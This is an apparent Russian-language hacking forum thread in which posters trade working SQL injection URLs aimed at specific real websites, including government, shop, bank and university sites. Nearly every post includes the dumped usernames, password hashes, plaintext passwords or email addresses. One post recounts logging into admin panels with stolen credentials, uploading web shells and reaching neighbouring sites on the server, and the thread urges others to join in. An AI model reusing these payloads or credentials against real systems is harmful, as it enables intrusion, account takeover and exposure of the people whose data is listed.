FNS, cremator (c) ламал недавно) можно достать модераторов.. и вешать активные хсс.. дальше не смотрел..
http://www.hat.kz/?order=3&category=-1+union+select+1,2,3,version(),5,6,7-- 5 ветка http://www.hat.kz/?order=3&category=-1+union+select+1,2,3,concat(table_name,char(58),table_schema),5,6,7+from+INFORMATION_SCHEMA.tables-- joomla) jos_users:hatkz_autosapa - видим что таблица пользователей находится в бд hatkz_autosapa и поэтому: http://www.hat.kz/?order=3&category=-1+union+select+1,2,3,concat(username,char(58),password,char(58),email),5,6,7+from+hatkz_autosapa.jos_users-- admin:0cc399da4fb1e5952f2b30c0bd84d6ad:1vt3X6E9loXO5f9W:[email protected]
Зона gov: Code: http://www.lvif.gov.lv/?object_id=1344+union+select+1,name,3+from+VF_admins-- Code: http://www.lvif.gov.lv/?object_id=1344+union+select+1,password,3+from+VF_admins-- логин/пасс: Code: videsinvfonds:f7S2ApsSKXbP Code: Fonds:tests ---------------------------------------- Code: http://www.mete.gov.al/rub.php?idr=121+and+1=2+union+select+1,2,3,4,5,6,concat(username,char(58),password),8,9,10,11,12+from+editor-- логин/пасс: Code: admin:da6908b78bbf1e1541001e8e3dbf2467 ---------------------------------------- Code: http://www.ert.gov.al/ert_alb/cal_det.html?Id=23+and+1=2+union+all+select+1,concat(userid,char(58),password),3,null,null,null,null,null+from+users/* логин/пасс: Code: altink:altinx ----------------------------------------- Покаместь все....
Online магазин Code: http://urshop.tv/product-view.html?p=-98+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+users--
4 ветка, читалка файлов не работает, доступа к mysql.users нет. http://www.pluralism.org/news/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+/*
Code: http://www.robappelhof.com/view.php?sub=yes&id=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+users/* логин/пасс: Code: sdf:asdf -------------------------------------------- Code: http://www.ghanadate.co.uk/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/* логин/пасс: Code: montego1234:cf160b832b994d0ca868dc74ef856880 ---------------------------------------- Code: http://www.fqs-al.org/index.php?faqe=list&kid=-9999+union+all+select+1,concat_ws(char(58),user,password),3,4,5+from+mysql.user-- логин/пасс: Code: yroot:129861984de011d2 Code: fqsweb:51dbed7249c11393 Code: fqs:34a07b654db61525 Code: yscr_a8fGf:261cc0e75ff78611 -------------------------------------------- Code: http://www.co-plan.org/egug/rub.php?idr=7+and+1=2+union+all+select+1,2,3,concat(username,char(58),password),5,6,7,8,9+from+editor--&l=a логин/пасс: Code: admin:fe01ce2a7fbac8fafaed7c982a04e229 ------------------------------------------------- Code: http://comenri.com/index.php?option=com_simpleshop&task=browse&Itemid=30&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users-- логин/пасс: Code: admin:acedc1e07c3ea3d226615527a4983e37:WQkaXp1lbltQZCmR ------------------------------------------------ Code: http://www.yappika.or.id/index.php?option=com_beamospetition&pet=-5%20UNION%20SELECT%20user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--&lang=id логин/пасс: Code: admin:c3839ac39113c5a82ca8547820819dbc:g454EJEzLbYjADq5 Code: fahrul:eea3b7ed87cdf07e7bbc4d577ccb6b5d:dixDCoe9nsft5h11 Code: Myleea:0f7b2d7ed181fd33cddc1ba9d79869d7:XpcWyKrnQgJuUXwU Code: Ira_Nezabudka:fd8ccc478642302747a2c4dc335a343a:PJkHhgwsMsFbSBnC Code: Rini:5b68afeea28450750bc4e055c109d752:NbEsp3lBDRnQhxJO Code: sawsarpaltela:54708a96d0ae079776ecefc35151d783:QHdpwJ6XhdsqRERs Code: wergiewom:06ecaade2a8f9d3ebf49a44ce7bb96d6:4OtKGLPrFWsx1C85 Code: Meloomime:d56dfae4bfbf100ed8b564587b3d672c:NFvCoL8vqnhbnQeP Code: Kibeirreste:9ae987505c6b005935c50074ea356193:mPrgld5lDjYniO6n Code: teja:3a39d97d4bd94cefacc88db044dc3c0e:D5vPL3RHV8qJK9je Code: Bambang:8bad21a0c5711f985d4a2a7d80d26f73:VXxkMgQnu1jS8WIF Code: shewiya:553761834941e5a605c80fd204a03786:CPk64H3Md7HYO323 Code: abu_rayyan:dc4678a51b68b10d2516c24e8fa6037e:MpRjGYy7zeTjBtMA Code: margarittaes:9346bb6ebd998c9b40a4b1dc716c238f:pR3GHfgyZutYRLe4 Code: sennioritta:2ef9195156e87d73787c7c1310a6bafc:aPKIaUJY6U02YEdz Code: Lilis:b6694dc2469ab892ab1593440aa0bfc8:uabh5vGv4tWSPkGH Code: oppownmix:878a75e5bf8a8c4d919da7ad46273d3e:VEJrYYnSXMUMH71f ------------------------------------------------ Code: http://www.heibai.net/article/forum_zoom.php?forumid=15)+and+1=2+union+select+1,concat(username,0x3a,password),3+from+user+where+userid=1/* логин/пасс: Code: starkun:f0295802427cb4e72233d6d2b97e62e1 ------------------------------------- Code: http://www.chemistry.montana.edu/news.php?id=4990+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7+from+mysql.user/* Code: root:05980b2317eaa529 ---------------------------------------------- The End!
Code: http://www.music.md/studio.php?stdid=-1%20union%20select%201,2,3,4,5%20from%20tbuser/* Не могу найти ни одной колонки из этой таблицы гребаной. В общем дружно ломаем
http://www.music.md/studio.php?stdid=-1+union+select+1,2,concat_ws(0x3a,usrLogin,usrPasswd),4,5+from+tbuser+limit+0,1/* пароли подходят к форуму
Code: http://cartoons.sev.com.au/index.php?catid=-1%20UNION%20SELECT%20concat(name,char(58),password),2,3,4,5,6,7,8,9,10%20FROM%20user%20LIMIT%201,1/* Code: http://cartoons.sev.com.au/index.php?catid=-1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10/* Code: http://www.pajuraturda.org/album.php?catid=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3/* Code: http://www.pajuraturda.org/album.php?catid=-1%20UNION%20SELECT%201,concat(user_password,char(58),username),3%20FROM%20phpbb_users%20LIMIT%201,1/*
Shop Code: http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,concat(user_name,0x3a,password)+from+users-- Code: http://www.ultraproducts.com/admin/
Code: http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+table_name,2,3,4,5+from+information_schema.tables+limit+1,1-- И перебирай таблицы,пока не найдеш нужную тебе колонку....когда найдеш почитай тут
PR5 http://www.uwsn.org/sup.php?id=-99999+union+select+1,2,3,4,unhex(hex(version())),6/* version:4.1.13-standard-log
Спасибо m0rgan !! newtid@localhost 5.0.32-Debian_7etch8-log http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+login,password,3,4,5+from+managers+limit+1,1%20-- admin:shokhov price:123456 isisis:123456 vale:valevale irina:123 towka:123456 boris:123 margarita:123456 kuzoff:54214 админку так и не нашел!
Акционерный коммерческий банк «Интеграл» (сокращенно АКБ «Интеграл-банк») – это универсальное банковское учреждение, предоставляющее полный комплекс услуг на внутреннем и внешнем финансовых рынках. url: http://fxintegral.com/ target: http://fxintegral.com/beginer/ справа email подписка RSS using: в имени вводим -999999' email: любой Description: 4 поля. Вывод не приходит на email. Запрос -999' не обрабатывается, при нажатии отправить выводит SQL Syntax и.т.д. Запрос union+select+user(),user(),user(),user()/* проходит успешно. Вывод запроса опять же не приходит на email. Не показывается на странице.На сайте доступны различные банковские операции.
а толку то? совсем ничего не даёт, ну узнал пользователей, пароли, а применить некуда. всю базу можно раскрутить а сделать ничего более. file_priv закрыт, ни шэлл, ни другие пакости не проходят
Эээ... Уважаемый , а что вы вообще хотите ??? Как то давно я поднимал тему на irc по поводу целесообразности и вообще надобности взломов Мало кто мог адекватно ответить для чего он ломает тот или иной ресурс. Сегодня за ночь пересмотрел почти всю эту ветку и тут помоему просто все учатся. Человеку показали как сделать определенное движение) Он его сделал и сказал спасибо! Я считаю это резальт который нужен. Спустя 20 мин) Уважаемый, Хакер это не тот человек который знает скул и как ее крутит, хакер этот тот кто думает головой. Перед тем как или во время поиска скули надо обращать внимание на все... надо собирать информацию об атакуемом сервере и понимать в конечном итоге что тебе надо от него , если только БД , то наш уважаемый -DREASTY- , толко что показал что данные очень элементарно экспортируются из БД администратора в наш Notepad++ это уже в своем роде пакость (а для кого то возможно и деньги), так что на ваш вопрос по поводу того "а толку то?" лично я ответил. Идем далее, с чего вы делаете такие поспешные выводы относителньо того что дальше ничего не сделать? Подколоть старательного ученика в том что он плохо научился пользоваться MySQL 5.+? Или это просто ваши выводы из ходя из того что Вы ничего не смогли сделать??? Итак(после быстрого моего анализа): _http://www.tid.odessa.ua/phpinfo.php _http://www.tid.odessa.ua/adserv/www/admin/ (пароль и логин подходят) это чисто управление пользователями,кликами,баннерами,БД,ПО,обновлением ддвига... после 10 минутнорго мучения заливки шелла через баннер shell.php.gif при том что там менял настройки хранения банера не в БД и не стороннем сервере а именно в каталоге сайта ... прав на исполнение все равно не было... поэтому шелл как был залит так и удален. болше ничего пробовать не сстал, поскольку понимал что где должно быть управление контентом сайта... Так оно и есть _http://www.tid.odessa.ua/siteadmin/ (логин пароль опять же подходят) там сразу есть заливка файлов прям первая первая страничка ... тыдынс _http://www.tid.odessa.ua/files/achat.php , поскольку не люблю функционал этого шелла сразу через еще и другой шелл. Более того права на сервере не велики , но на чтение практически все. более того можем вылезти из корней директории выше на другие сайты ... 2ip показал что их 3 , но в реале их там больше! Вывод: Уважаемый не делайте поспешных выводов!!! Прошу простить Администрацию и Модератора за типа оффтоп... ну просто правда выбесил пассажир =((
_http://www.kcl.ac.uk/news/news_details.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,email,15,16,17,18,19,20,21,22,23,24,25+from+users--&year=2008 4.1.22-standard-log::webteam_newsdev::newsdev@localhost Next: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] префиксов нет ни перед таблицами ни в колонках. поэтому твоя фраза "к сожелению мало чем помогло)", черезчур поспешна ... кто ищет тот всегда найдет ...
